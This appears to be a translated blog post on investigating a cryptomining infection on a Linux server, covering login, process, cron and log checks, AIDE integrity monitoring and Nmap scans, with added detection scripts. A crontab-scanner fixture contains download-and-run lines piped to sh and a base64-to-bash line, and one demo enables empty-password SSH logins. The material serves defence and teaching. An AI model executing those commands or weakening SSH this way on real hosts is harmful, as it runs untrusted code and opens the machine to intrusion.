Foreword


  • While at school I rented a student server on Alibaba Cloud and installed Docker to play with. Later, I don't know what happened, but a port got exposed through the Docker client.

  • A foreign mining Trojan was planted on it. I had only deployed a graduation project, yet the CPU was pegged every day; the machine had been pulled into mining 🙁

  • I struggled with it for a long time: the process could not be killed, deleting the files directly made the machine hang, and in the end I submitted a work order to reset it.

  • I put together this blog post as a brief note on the issue.

  • The post covers:

    • Basic screening steps when you run into mining
    • Two simple defenses
  • The post does not go through specific cases; it only gives some directions for finding the problem.

People who push themselves too hard can't run far; those who really stick it out to the end rely not on passion but on just the right amount of love and investment.


Mining Trojans

A mining Trojan is malware that attackers plant after breaking into a computer by whatever means, so that the compromised machine's computing power mines cryptocurrency for their profit without the owner's knowledge. It can be a script that scans and attacks automatically, or it can be packaged into a single executable file.

To stay on the server for a long time, a mining Trojan uses various defensive countermeasures of its own, such as modifying the scheduled tasks, the firewall configuration, and the system's dynamic link libraries. Heavy use of these techniques can interrupt the services the server runs.

Is the machine being mined?

  • Has the machine's CPU usage gone up, does the system stall, do some services no longer run normally, and so on
  • Check the server's performance through the performance monitoring system
  • Check the alarms of the security detection system, which can show that the Trojan is connecting to a mining pool address

General handling steps

  • When a suspicious process shows up, find the user of the host and confirm what the process is;
  • Once it is identified as a mining process, trace it back to its source. Attackers usually add settings that restart the mining process after it is killed, so tracing lets you find those configurations, follow the attacker's path in, and apply targeted defenses and patches so the same way in cannot be used again.
  • After tracing, block the mining pool address, clear the scheduled tasks, disable suspicious users, end abnormal processes, remove the mining Trojan, clean out all malware, and harden the system.
  • Determine when mining started from the creation time of the Trojan file and of the scheduled task, and record the address of the mining pool.

Linux Operations

System screening

Checking User Information

All user information: cat /etc/passwd

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
........
oprofile:x:16:16:Special user account to be used by OProfile:/var/lib/oprofile:/sbin/nologin

Users' last login information: lastlog

Displays the last login of every user on the system. The lastlog file is updated every time a user logs in; the lastlog command formats the contents of /var/log/lastlog and can also show the last login time of a specific user. It prints the login name, port (TTY), and last login time, sorted by UID. For a user who has never logged in it prints **Never logged in**. Run this command as root.

$ lastlog
Username         Port     From             Latest
root             pts/0    192.168.26.1     Thu Mar  3 16:47:46 +0800 2022
bin                                        **Never logged in**
daemon                                     **Never logged in**
postfix                                    **Never logged in**
sshd                                       **Never logged in**
chrony                                     **Never logged in**
tom                                        **Never logged in**
nginx                                      **Never logged in**
etcd                                       **Never logged in**
apache                                     **Never logged in**
pcp                                        **Never logged in**
mysql                                      **Never logged in**
oprofile                                   **Never logged in**

Failed user logins: lastb

The Linux lastb command lists the users who failed to log in to the system. On its own, lastb reads /var/log/btmp and displays the list of failed logins.

$ lastb
root     ssh:notty    192.168.26.1     Thu Mar  3 16:50 - 16:50  (00:00)
root     ssh:notty    192.168.26.1     Thu Mar  3 16:50 - 16:50  (00:00)

btmp begins Thu Mar  3 16:50:54 2022

Users' most recent logins: last

The Linux last command is used to display the latest login information of a user.

$ last -5
root     pts/0        192.168.26.1     Thu Mar  3 16:47   still logged in
root     pts/0        192.168.26.1     Thu Mar  3 09:43 - 16:45  (07:02)
root     pts/0        192.168.26.1     Wed Mar  2 16:07 - 23:06  (06:58)
root     pts/0        192.168.26.1     Tue Mar  1 16:40 - 20:04  (03:23)
root     pts/1        192.168.26.1     Mon Feb 28 12:46 - 11:18  (22:31)

wtmp begins Thu Oct 18 23:13:06 2018

Accounts with an empty password: awk -F ':' 'length($2)==0 {print $1}' /etc/shadow

$ awk -F ':' 'length($2)==0 {print $1}' /etc/shadow
$ useradd test
$ passwd -d test
Removing password for user test.
passwd: Success
$ awk -F ':' 'length($2)==0 {print $1}' /etc/shadow
test

Empty-password login restriction: cat /etc/ssh/sshd_config | grep PermitEmptyPasswords

$ cat /etc/ssh/sshd_config | grep PermitEmptyPasswords
#PermitEmptyPasswords no
# Setting PermitEmptyPasswords yes allows logins with an empty password
$ sed -i 's/#PermitEmptyPasswords no/PermitEmptyPasswords yes/g' /etc/ssh/sshd_config
$ systemctl restart sshd

PS E:\docker> ssh test@192.168.26.55
Last login: Thu Mar  3 17:30:48 2022 from 192.168.26.1
[test@liruilongs ~]$ uptime
 17:34:27 up 3 days, 23:33,  2 users,  load average: 0.17, 0.09, 0.07
[test@liruilongs ~]$
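The two checks above (empty-password accounts and the PermitEmptyPasswords setting) only matter in combination, so here they are put together as one audit. This is an added example, not code from the original post; it runs on constructed copies of /etc/shadow and sshd_config so it works offline, and the file names and the placeholder hash are made up.

```shell
#!/bin/sh
# Added example (not from the original post): audit for the two conditions
# checked above, empty-password accounts and PermitEmptyPasswords, on copies
# of /etc/shadow and sshd_config so it runs offline. The sample files below
# are constructed; on a live host pass the real paths (reading /etc/shadow
# needs root).

# find_empty_password_accounts SHADOW_FILE
#   prints one user name per line whose password field (field 2) is empty.
find_empty_password_accounts() {
    awk -F ':' 'length($2)==0 {print $1}' "$1"
}

# effective_permit_empty_passwords SSHD_CONFIG
#   prints the value sshd will use: the first uncommented PermitEmptyPasswords
#   keyword wins; when none is set, the compiled-in default is "no".
effective_permit_empty_passwords() {
    val=$(awk 'tolower($1) == "permitemptypasswords" { print tolower($2); exit }' "$1")
    printf '%s\n' "${val:-no}"
}

# audit SHADOW_FILE SSHD_CONFIG
#   prints a verdict line; returns 1 only for the dangerous combination of
#   at least one empty-password account AND sshd accepting empty passwords.
audit() {
    accounts=$(find_empty_password_accounts "$1")
    permit=$(effective_permit_empty_passwords "$2")
    if [ -n "$accounts" ] && [ "$permit" = "yes" ]; then
        printf 'RISK: PermitEmptyPasswords=yes and empty-password account(s): %s\n' \
            "$(printf '%s' "$accounts" | tr '\n' ' ')"
        return 1
    fi
    printf 'OK: PermitEmptyPasswords=%s, empty-password account(s): %s\n' \
        "$permit" "${accounts:-none}"
    return 0
}

# Constructed sample data (not a real shadow file; the hash is a placeholder).
sample_dir=$(mktemp -d)
cat > "$sample_dir/shadow" <<'EOF'
root:$6$placeholder$placeholderhash:19000:0:99999:7:::
bin:*:18000:0:99999:7:::
nginx:!!:18000::::::
test::19054:0:99999:7:::
EOF
cat > "$sample_dir/sshd_config.weak" <<'EOF'
# commented default left in place, then overridden further down
#PermitEmptyPasswords no
PermitEmptyPasswords yes
EOF
cat > "$sample_dir/sshd_config.hardened" <<'EOF'
PermitEmptyPasswords no
PasswordAuthentication yes
EOF

audit "$sample_dir/shadow" "$sample_dir/sshd_config.weak"      # RISK line, exit status 1
audit "$sample_dir/shadow" "$sample_dir/sshd_config.hardened"  # OK line, exit status 0
```

The config parser only looks at top-level keywords; it does not understand Match blocks, so on a live host confirm the effective value with `sshd -T | grep -i permitemptypasswords`.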

Process check

Here we use a stress tool to simulate 100% CPU usage.

$ yum -y install stress
$ nohup stress -c 1 -t 100 &
[1] 132748
$ nohup: ignoring input and appending output to 'nohup.out'

We also need the lsof tool.

$ yum -y install lsof

System processes: ps aux

$ ps --no-headers -eo %cpu,pid,args | sort -k1 -n -r | head -10
99.6 134004 stress -c 1 -t 500
 1.7   8079 sidekiq 5.0.5 gitlab-rails [0 of 25 busy]
 1.4    843 /usr/bin/etcd --name=default --data-dir=/var/lib/etcd/default.etcd --listen-client-urls=http://192.168.26.55:2379,http://localhost:2379
 1.2   8156 /opt/gitlab/embedded/bin/prometheus -web.listen-address=localhost:9090 -storage.local.path=/var/opt/gitlab/prometheus/data -storage.local.chunk-encoding-version=2 -storage.local.target-heap-size=67827957 -config.file=/var/opt/gitlab/prometheus/prometheus.yml
 1.2   8060 /opt/gitlab/embedded/bin/redis-server 127.0.0.1:0
 1.1   8091 /opt/gitlab/embedded/bin/ruby /opt/gitlab/embedded/bin/gitlab-mon web -c /var/opt/gitlab/gitlab-monitor/gitlab-monitor.yml
 0.6   8198 ruby /opt/gitlab/embedded/service/gitaly-ruby/bin/gitaly-ruby 490 /tmp/gitaly-ruby360216715/socket.1
 0.6   8196 ruby /opt/gitlab/embedded/service/gitaly-ruby/bin/gitaly-ruby 490 /tmp/gitaly-ruby360216715/socket.0
 0.5   7467 java -Duser.home=/var/jenkins_home -Dhudson.security.csrf.GlobalCrumbIssuerConfiguration.DISABLE_CSRF_PROTECTION=true -Djenkins.model.Jenkins.slaveAgentPort=50000 -jar /usr/share/jenkins/jenkins.war
 0.3      9 [rcu_sched]

Processes, ports, and their PIDs: netstat -antp or ss

$ netstat -antp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:2379          0.0.0.0:*               LISTEN      843/etcd
tcp        0      0 192.168.26.55:2379      0.0.0.0:*               LISTEN      843/etcd
tcp        0      0 127.0.0.1:2380          0.0.0.0:*               LISTEN      843/etcd
tcp        0      0 192.168.26.55:2380      0.0.0.0:*               LISTEN      843/etcd
tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN      7347/docker-proxy
........
tcp6       0      0 :::2376                 :::*                    LISTEN      1521/dockerd
tcp6       0      0 ::1:4330                :::*                    LISTEN      36013/pmlogger

CPU usage: top or ps

$ top
top - 18:18:25 up 4 days, 17 min,  2 users,  load average: 0.51, 0.62, 0.77
Tasks: 249 total,   2 running, 247 sleeping,   0 stopped,   0 zombie
%Cpu(s): 52.5 us,  0.2 sy,  0.0 ni, 47.0 id,  0.3 wa,  0.0 hi,  0.0 si,  0.0 st
KiB Mem :  2031912 total,    77056 free,  1712644 used,   242212 buff/cache
KiB Swap: 10485756 total,  8991960 free,  1493796 used.    88756 avail Mem

   PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
134004 root      20   0    7264    100      0 R 100.0  0.0   0:37.87 stress
  8079 chrony    20   0  889220 349276   1624 S   1.3 17.2  98:16.80 bundle
   843 etcd      20   0 10.308g   5488    824 S   1.0  0.3  83:53.19 etcd
  8156 992       20   0  348680  56736   3920 S   1.0  2.8  71:08.16 prometheus
........
  8060 nginx     20   0   41636   3676    888 S   0.7  0.2  75:50.13 redis-server
........
     9 root      20   0       0      0      0 S   0.3  0.0  20:37.39 rcu_sched
  8196 chrony    20   0 1314608     36      0 S   0.3  0.0  34:57.02 ruby
........
    15 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kworker/1:0H

Take a closer look at the suspicious process: lsof -p PID

$ lsof -p 134004
COMMAND    PID USER   FD   TYPE DEVICE SIZE/OFF      NODE NAME
stress  134004 root  cwd    DIR    8,1     4096 134217793 /root
stress  134004 root  rtd    DIR    8,1     4096        64 /
stress  134004 root  txt    REG    8,1    27704 277828820 /usr/bin/stress
stress  134004 root  mem    REG    8,1  2127336 402654082 /usr/lib64/libc-2.17.so
stress  134004 root  mem    REG    8,1  1139680 402654090 /usr/lib64/libm-2.17.so
stress  134004 root  mem    REG    8,1   164264 402654075 /usr/lib64/ld-2.17.so
stress  134004 root    0w   CHR    1,3      0t0        18 /dev/null
stress  134004 root    1w   REG    8,1       66 145012428 /root/nohup.out
stress  134004 root    2w   REG    8,1       66 145012428 /root/nohup.out

View the suspicious process in detail: ll /proc/PID (in this run the stress job had already finished, so its /proc directory was gone)

$ ll /proc/134004
ls: cannot access /proc/134004: No such file or directory
[1]+  Done                    nohup stress -c 1 -t 500

Look at the suspicious port in detail: lsof -i :port

$ lsof -i
COMMAND     PID      USER   FD   TYPE  DEVICE SIZE/OFF NODE NAME
chronyd     642    chrony   1u  IPv4   21585      0t0  UDP localhost:323
chronyd     642    chrony   2u  IPv6   21586      0t0  UDP localhost:323
etcd        843      etcd   5u  IPv4   24201      0t0  TCP vms55.rhce.cc:2380 (LISTEN)
etcd        843      etcd   6u  IPv4   24209      0t0  TCP localhost:2380 (LISTEN)
........
pmcd       1011       pcp   3u  IPv6   23985      0t0  TCP localhost:pmcd (LISTEN)
master     1036      root  13u  IPv4   24056      0t0  TCP localhost:smtp (LISTEN)
........
sshd     121037      root   3u  IPv4 3821579      0t0  TCP vms55.rhce.cc:ssh->192.168.26.1:13570 (ESTABLISHED)
sshd     127459      root   3u  IPv4 3850818      0t0  TCP *:ssh (LISTEN)
sshd     127459      root   4u  IPv6 3850820      0t0  TCP *:ssh (LISTEN)
sshd     128629      root   3u  IPv4 3856418      0t0  TCP vms55.rhce.cc:ssh->192.168.26.1:5928 (ESTABLISHED)
sshd     128631 liruilong   3u  IPv4 3856418      0t0  TCP vms55.rhce.cc:ssh->192.168.26.1:5928 (ESTABLISHED)
$ lsof -i :7269
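The process checks above (the sorted ps listing, then lsof -p to see where the binary lives) can be turned into one triage pass over a snapshot. The following is an added example, not code from the original post: it reads a snapshot in the format of the ps command shown earlier and flags the indicators the post describes. The snapshot is constructed; the second line is a made-up miner with a made-up pool host, not a real indicator.

```shell
#!/bin/sh
# Added example (not from the original post): triage a process snapshot of the
# form produced above by
#   ps --no-headers -eo %cpu,pid,args | sort -k1 -n -r
# and flag the things the post says to look for: runaway CPU, a mining-pool
# URL on the command line, and a binary started from a world-writable tmp
# directory (what lsof -p showed as the TXT path). The snapshot below is
# constructed; the second line is a made-up miner, not a real indicator.

PS_SNAPSHOT='99.6 134004 stress -c 1 -t 500
97.2 140211 /tmp/.hidden/worker -o stratum+tcp://pool.example.invalid:3333 -u constructed-wallet
 1.7   8079 sidekiq 5.0.5 gitlab-rails [0 of 25 busy]
 1.4    843 /usr/bin/etcd --name=default
 0.6   8198 ruby /opt/gitlab/embedded/service/gitaly-ruby/bin/gitaly-ruby 490 /tmp/gitaly-ruby360216715/socket.1
 0.3      9 [rcu_sched]'

# triage CPU_THRESHOLD
#   reads snapshot lines on stdin; prints "<pid>\t<reasons>" for each process
#   that trips at least one check. Only the executable ($3) is tested for the
#   tmp-directory rule, so a legitimate process merely using a /tmp socket
#   (gitaly above) is not flagged.
triage() {
    awk -v threshold="$1" '
    {
        cpu = $1 + 0
        pid = $2
        exe = $3
        reasons = ""
        if (cpu >= threshold)
            reasons = reasons "high-cpu(" cpu "%) "
        if (tolower($0) ~ /stratum[+](tcp|ssl|tls)?:\/\//)
            reasons = reasons "pool-url "
        if (exe ~ /^\/(tmp|var\/tmp|dev\/shm)\//)
            reasons = reasons "runs-from-tmp "
        if (reasons != "")
            printf "%s\t%s\n", pid, reasons
    }'
}

printf '%s\n' "$PS_SNAPSHOT" | triage 50
```

On a live host pipe the real ps command into `triage 50`. For any PID it flags, `ls -l /proc/PID/exe` is worth a look as well: if the binary was deleted after it started, the link target is shown with a "(deleted)" suffix, a common sign that a miner is hiding its file.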

Log screening

Scheduled task (cron) logs:

Current crontab: crontab -l

$ crontab -l
no crontab for root

Cron-related files under /etc: ls /etc/cron*

$ ls /etc/cron*
/etc/cron.deny  /etc/crontab

/etc/cron.d:
0hourly  sysstat

/etc/cron.daily:
logrotate  man-db.cron

/etc/cron.hourly:
0anacron

/etc/cron.monthly:

/etc/cron.weekly:

Cron execution log: cat /var/log/cron

$ cat /var/log/cron | head -3
Feb 27 03:43:13 liruilongs run-parts(/etc/cron.daily)[65785]: finished man-db.cron
Feb 27 03:43:13 liruilongs anacron[59178]: Job `cron.daily' terminated
Feb 27 03:43:13 liruilongs anacron[59178]: Normal exit (1 job run)

Related mail spool files: ls /var/spool/mail

$ ls /var/spool/mail/
liruilong  test  tom
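Looking through crontab -l, /etc/cron* and the cron log by hand is the way the post does it; the same hunt for the "respawn after kill" settings described in the handling steps can be scripted. This is an added example, not code from the original post. The sample crontab is constructed (the IP is from the 198.51.100.0/24 documentation range and the base64 string decodes to "hello"), and audit_cron_sources shows how the same scan would be fed from a live host's real cron sources.

```shell
#!/bin/sh
# Added example (not from the original post): scan crontab text for the
# persistence patterns a mining Trojan typically leaves so that it comes back
# after the process is killed. The sample below is constructed (the IP is from
# the documentation range 198.51.100.0/24 and the base64 string decodes to
# "hello"); on a live host feed it the real cron sources, as audit_cron_sources
# does.

SAMPLE_CRONTAB='# constructed sample crontab
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * /tmp/.cache/update.sh >/dev/null 2>&1
* * * * * (curl -fsSL http://198.51.100.7/i.sh || wget -q -O- http://198.51.100.7/i.sh) | sh
@reboot echo aGVsbG8= | base64 -d | bash
0 */6 * * * /usr/local/bin/backup --target /mnt/backup'

# flag_cron_entries
#   reads crontab lines on stdin, skips comments and blank lines, and prints
#   "<reasons>\t<entry>" for each entry matching a strong indicator. A
#   minute-level schedule is only reported alongside a strong indicator,
#   because plenty of legitimate jobs run every few minutes.
flag_cron_entries() {
    awk '
    /^[[:space:]]*#/ { next }
    /^[[:space:]]*$/ { next }
    {
        strong = ""
        if ($0 ~ /(curl|wget)[^|]*\|[[:space:]]*(ba|z|da)?sh/)
            strong = strong "download-and-run "
        if ($0 ~ /base64[[:space:]]+(-d|--decode)/)
            strong = strong "base64-payload "
        if ($0 ~ /(^|[[:space:]])\/(tmp|var\/tmp|dev\/shm)\//)
            strong = strong "runs-from-tmp "
        if (strong == "") next
        if ($1 == "*" || $1 ~ /^\*\/[0-9]+$/)
            strong = strong "every-few-minutes "
        printf "%s\t%s\n", strong, $0
    }'
}

# audit_cron_sources
#   runs the scan over every cron source on a live host (needs root).
audit_cron_sources() {
    {
        cat /etc/crontab /etc/cron.d/* 2>/dev/null
        cut -d: -f1 /etc/passwd | while IFS= read -r user; do
            crontab -l -u "$user" 2>/dev/null
        done
    } | flag_cron_entries
}

printf '%s\n' "$SAMPLE_CRONTAB" | flag_cron_entries
```

Entries in /etc/crontab and /etc/cron.d carry an extra user field, which is why the checks match on the whole line rather than on a fixed command column.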

System logs:

Overall system messages: cat /var/log/messages

$ cat /var/log/messages | head -3
Feb 27 03:50:01 liruilongs systemd: Started Session 157 of user root.
Feb 27 03:55:18 liruilongs systemd: Starting Check pmlogger instances are running...
Feb 27 03:55:21 liruilongs systemd: Started Check pmlogger instances are running.

Authentication and authorization events: cat /var/log/secure

$ cat /var/log/secure | head -5
Feb 27 11:17:41 liruilongs sshd[110566]: pam_unix(sshd:session): session closed for user root
Feb 27 17:38:04 liruilongs sshd[148418]: Accepted password for root from 192.168.26.1 port 11561 ssh2
Feb 27 17:38:04 liruilongs sshd[148418]: pam_unix(sshd:session): session opened for user root by (uid=0)
Feb 28 10:05:52 liruilongs sshd[148418]: pam_unix(sshd:session): session closed for user root
Feb 28 12:12:37 liruilongs sshd[94739]: Accepted password for root from 192.168.26.1 port 13775 ssh2

Last login of every user: cat /var/log/lastlog (a binary file; the lastlog command shown earlier prints it readably)

All failed logins: cat /var/log/btmp (also binary; read it with lastb)

Mail server logs: cat /var/log/maillog

Shell commands run before: cat ~/.bash_history
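The /var/log/secure lines above are where an SSH break-in shows first: a run of "Failed password" lines from one address followed by an "Accepted password". The following is an added example, not code from the original post: it summarises those events per source address and picks out the sources that guessed and then got in. The log lines are constructed (203.0.113.0/24 is a documentation range); on a live host run ssh_login_summary against the real file.

```shell
#!/bin/sh
# Added example (not from the original post): summarise sshd password events
# from /var/log/secure-style lines per source address, then pick out sources
# that guessed passwords and eventually got in. The log lines below are
# constructed (203.0.113.0/24 is a documentation range); on a live host use
#   ssh_login_summary < /var/log/secure

SAMPLE_SECURE='Feb 27 17:38:04 liruilongs sshd[148418]: Accepted password for root from 192.168.26.1 port 11561 ssh2
Mar  3 02:11:09 liruilongs sshd[151001]: Failed password for invalid user admin from 203.0.113.45 port 40122 ssh2
Mar  3 02:11:12 liruilongs sshd[151003]: Failed password for root from 203.0.113.45 port 40130 ssh2
Mar  3 02:11:15 liruilongs sshd[151005]: Failed password for root from 203.0.113.45 port 40138 ssh2
Mar  3 02:11:19 liruilongs sshd[151007]: Accepted password for root from 203.0.113.45 port 40142 ssh2
Mar  3 02:11:19 liruilongs sshd[151007]: pam_unix(sshd:session): session opened for user root by (uid=0)
Mar  3 09:40:01 liruilongs sshd[151900]: Failed password for tom from 192.168.26.1 port 50110 ssh2'

# ssh_login_summary
#   reads log lines on stdin and prints one line per source IP, sorted:
#   "<ip> failed=<n> accepted=<n> users=<user,user,...>"
ssh_login_summary() {
    awk '
    / sshd\[[0-9]+\]: (Accepted|Failed) password for / {
        # after "for" comes either the user, or "invalid user <name>"
        for (i = 1; i <= NF; i++) {
            if ($i == "for") user = ($(i+1) == "invalid") ? $(i+3) : $(i+1)
            if ($i == "from") ip = $(i+1)
        }
        if ($0 ~ /Accepted password/) accepted[ip]++; else failed[ip]++
        if (!((ip, user) in seen_user)) {
            seen_user[ip, user] = 1
            users[ip] = (users[ip] == "") ? user : users[ip] "," user
        }
        seen[ip] = 1
    }
    END {
        for (ip in seen)
            printf "%s failed=%d accepted=%d users=%s\n", ip, failed[ip] + 0, accepted[ip] + 0, users[ip]
    }' | sort
}

# brute_force_successes MIN_FAILED
#   reads summary lines and prints the source IPs with at least MIN_FAILED
#   failures and at least one success: the sessions to trace first.
brute_force_successes() {
    awk -v min_failed="$1" '
    {
        split($2, f, "="); split($3, a, "=")
        if (f[2] + 0 >= min_failed && a[2] + 0 >= 1) print $1
    }'
}

printf '%s\n' "$SAMPLE_SECURE" | ssh_login_summary
printf '%s\n' "$SAMPLE_SECURE" | ssh_login_summary | brute_force_successes 3
```

Once a source stands out, the sshd PID in its "Accepted password" line (151007 in the sample) is the key into the rest of /var/log/secure: the "session opened" line carries the same PID, and the session's start time bounds the search in /var/log/cron and ~/.bash_history.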

The above are the conventional investigation methods, but attackers usually erase their traces, so you may end up finding nothing. Remember to kill the mining process promptly, and then keep investigating how the attacker got in so you are ready for the next attempt.

Simple prevention measures

AIDE Intrusion Detection

The Advanced Intrusion Detection Environment (AIDE) is a host-based intrusion detection system that works by checking file integrity.

How AIDE works

  • Run a thorough check of the computer before it is tampered with
  • Record the state of every file (timestamps, size, permissions, hash values, and so on)
  • After a suspected compromise, run the same check again
  • Compare the pre-intrusion and post-intrusion results to find out which data has changed

$ yum -y install aide

Configuration file

$ vim /etc/aide.conf
# Example configuration file for AIDE.

# DBDIR: where the database is stored after AIDE has checked the data
@@define DBDIR /var/lib/aide
# LOGDIR: where the AIDE log files are stored
@@define LOGDIR /var/log/aide

# database: the baseline read by aide --check. After a suspected intrusion,
# rename the previously generated aide.db.new.gz to aide.db.gz; the fresh
# result aide.db.new.gz is then compared against this earlier aide.db.gz
database=file:@@{DBDIR}/aide.db.gz
......
# database_out: where the result of a check is written
# (under /var/lib/aide, as aide.db.new.gz)
database_out=file:@@{DBDIR}/aide.db.new.gz
......
#p:      permissions      # check whether the file's permissions changed
#i:      inode            # check whether the file's inode changed
#n:      number of links
#u:      user             # check whether the file's owner changed
#g:      group            # check whether the file's group changed
#s:      size             # check whether the file's size changed
#md5:    md5 checksum     # check the file's md5 hash
#sha1:   sha1 checksum    # check the file's sha1 hash
#sha256: sha256 checksum  # check the file's sha256 hash

# a variable that combines all of the checks above
FIPSR = p+i+n+u+g+s+m+c+acl+selinux+xattrs+sha256
......
# a variable that checks only the hash; referenced by the rules below
NORMAL = sha256

Directories to check

$ vim /etc/aide.conf
.........
# Extended content + file type + access.
CONTENT_EX = sha256+ftype+p+u+g+n+acl+selinux+xattrs

# Some files get updated automatically, so the inode/ctime/mtime change
# but we want to know when the data inside them changes.
DATAONLY =  p+n+u+g+s+acl+selinux+xattrs+sha256

# Next decide what directories/files you want in the database. Aide
# uses a first match system. Put file specific instructions before generic
# matches. e.g. Put file matches before directories.

# CONTENT_EX expands to sha256+ftype+p+u+g+n+acl+selinux+xattrs
/boot/   CONTENT_EX
/bin/    CONTENT_EX
/sbin/   CONTENT_EX
/lib/    CONTENT_EX
/lib64/  CONTENT_EX
/opt/    CONTENT

# Admin's dot files constantly change, just check perms.
/root/\..* PERMS
# Otherwise get all of /root.
/root/   CONTENT_EX

# These are too volatile.
# A leading ! marks a directory that is not checked.
!/usr/src/
!/usr/tmp/
# Otherwise get all of /usr.
/usr/    CONTENT_EX

Here is a simple test: modify the configuration file so that only files under /tmp are checked

DATAONLY =  p+n+u+g+s+acl+selinux+xattrs+sha256
........
/tmp/    DATAONLY
#/boot/  CONTENT_EX
#/bin/   CONTENT_EX
#/sbin/  CONTENT_EX
#/lib/   CONTENT_EX
#/lib64/ CONTENT_EX
#/opt/   CONTENT

Initialization check

Initialization check: builds the baseline database from the configuration file before any attack

$ aide --init

AIDE, version 0.15.1

### AIDE database at /var/lib/aide/aide.db.new.gz initialized.

Look at the generated database file. AIDE writes the same file name on every run.

$ ll /var/lib/aide/aide.db.new.gz
-rw------- 1 root root 39758 Mar  3 19:04 /var/lib/aide/aide.db.new.gz

Back up the database file to a safe location (USB flash drive, CD-ROM, portable hard disk, network storage) before any intrusion happens

$ mv /var/lib/aide/aide.db.new.gz /mnt/

Checking after an intrusion

Copy the backed-up database file back to /var/lib/aide

$ cp /mnt/aide.db.new.gz /var/lib/aide/aide.db.gz

The configuration file defines the reference database as aide.db.gz, so the backed-up aide.db.new.gz has to be renamed when it is copied back.

$ aide --check

AIDE, version 0.15.1

### All files match AIDE database. Looks okay!

No changes are detected until a file is modified; now append to a file under /tmp:

$ echo aide test >> /tmp/test.txt

After modifying a file under /tmp, run aide --check again and compare.

$ aide --check
AIDE 0.15.1 found differences between database and filesystem!!
Start timestamp: 2022-03-03 19:10:51

Summary:
  Total number of files:        2712
  Added files:                  1
  Removed files:                0
  Changed files:                0

---------------------------------------------------
Added files:
---------------------------------------------------

added: /tmp/test.txt
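The init, back up, check workflow above is easy to reproduce without AIDE, which makes the principle concrete. The following is an added example, not code from the original post and not AIDE's own code: a minimal file-integrity baseline and comparison that records path, mode, owner, size and sha256 per file, exactly the attributes the aide.conf comments list. It assumes GNU coreutils (stat -c and sha256sum) and works on a scratch directory it creates itself.

```shell
#!/bin/sh
# Added example (not from the original post and not AIDE's own code): a tiny
# file-integrity baseline/compare that mirrors the AIDE workflow above
# (init -> store baseline somewhere safe -> check), so the idea can be tried on
# a scratch directory. Assumes GNU coreutils (stat -c, sha256sum); records
# path, mode, uid, gid, size and sha256, tab-separated, one file per line.

# fim_snapshot DIR
#   prints the current state of every regular file under DIR, sorted by path.
fim_snapshot() {
    ( cd "$1" && find . -type f | LC_ALL=C sort | while IFS= read -r f; do
        set -- $(stat -c '%a %u %g %s' "$f")
        printf '%s\t%s\t%s\t%s\t%s\t%s\n' "$f" "$1" "$2" "$3" "$4" \
            "$(sha256sum "$f" | cut -d' ' -f1)"
    done )
}

# fim_init DIR DBFILE   (analogue of aide --init)
fim_init() {
    fim_snapshot "$1" > "$2"
}

# fim_check DIR DBFILE  (analogue of aide --check)
#   prints "added:", "removed:" and "changed: <path> (<attributes>)" lines;
#   returns 0 when everything matches the baseline, 1 otherwise.
fim_check() {
    fim_snapshot "$1" | awk -F '\t' -v db="$2" '
    BEGIN {
        while ((getline line < db) > 0) {
            split(line, b, "\t")
            base[b[1]] = line
        }
        close(db)
    }
    {
        current[$1] = 1
        if (!($1 in base)) { print "added: " $1; diffs++; next }
        if (base[$1] != $0) {
            split(base[$1], b, "\t")
            what = ""
            if (b[2] != $2) what = what "mode "
            if (b[3] != $3 || b[4] != $4) what = what "owner "
            if (b[5] != $5) what = what "size "
            if (b[6] != $6) what = what "sha256 "
            print "changed: " $1 " (" what ")"
            diffs++
        }
    }
    END {
        for (path in base) if (!(path in current)) { print "removed: " path; diffs++ }
        exit (diffs > 0) ? 1 : 0
    }'
}

# Demo on a constructed scratch tree: baseline, then tamper, then re-check.
demo=$(mktemp -d)
mkdir "$demo/tree"
printf 'hello\n' > "$demo/tree/a.txt"
fim_init "$demo/tree" "$demo/baseline.db"        # keep this file off the host in real use
fim_check "$demo/tree" "$demo/baseline.db" && echo "All files match the baseline."
printf 'aide test\n' >> "$demo/tree/a.txt"        # content change
: > "$demo/tree/test.txt"                          # new file
fim_check "$demo/tree" "$demo/baseline.db" || echo "Differences found."
```

The baseline is only trustworthy if an intruder cannot rewrite it, which is the reason the post moves aide.db.new.gz to removable or network storage; the same applies to baseline.db here.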

NMAP scan

Nmap is a powerful network scanner that supports several scanning techniques: ping scans, multi-port scans, and TCP/IP fingerprinting.

nmap [scan type] [options] <scan target ...>

Common scan types

  • -sS, TCP SYN scan (half-open)
  • -sT, TCP connect scan (fully open)
  • -sU, UDP scan
  • -sP, ICMP (ping) scan (in current Nmap releases this is an alias of -sn)
  • -A, full analysis of the target system (OS detection, version detection, script scanning, traceroute)

TCP connect scan (fully open):

In the left figure, to check whether port 80 of the target host is open, host A sends a SYN to port 80 of the target to start a connection. The target replies with SYN/ACK. Host A then replies with an ACK, the connection is established, and port 80 of the target is therefore open.

TCP SYN scan (half-open):

In the right figure, to check whether port 80 of the target host is open, host A again sends a SYN to port 80 of the target. The target replies with SYN/ACK, which already shows that port 80 is open, so host A does not send the final ACK and saves the resources of completing the connection. Because no connection has to be established and a reply from the target is enough, this saves considerably more system resources when many hosts are scanned.

Nmap usage examples

Here the scanning machine is a Linux subsystem (WSL) on the local Windows host, and the scanned machine is a Linux virtual machine on the same Windows host.

Check whether the target host is alive (ping scan)

# nmap -n -sP 192.168.26.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-03 19:28 CST
Nmap scan report for 192.168.26.55
Host is up (latency).                    # 192.168.26.55 is alive
Nmap done: 256 IP addresses (1 host up) scanned in 10.61 seconds

Scanning HTTP Ports

# nmap -n 192.168.26.55 -p 80
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-03 19:31 CST
Nmap scan report for 192.168.26.55
Host is up (0.00089s latency).

PORT   STATE SERVICE
80/tcp open  http                        # open, service HTTP

Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds

Scan the status of port 80 across the whole 192.168.26.0/24 segment

# nmap -n 192.168.26.0/24 -p 80
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-03 19:32 CST
Nmap scan report for 192.168.26.1
Host is up (0.00052s latency).

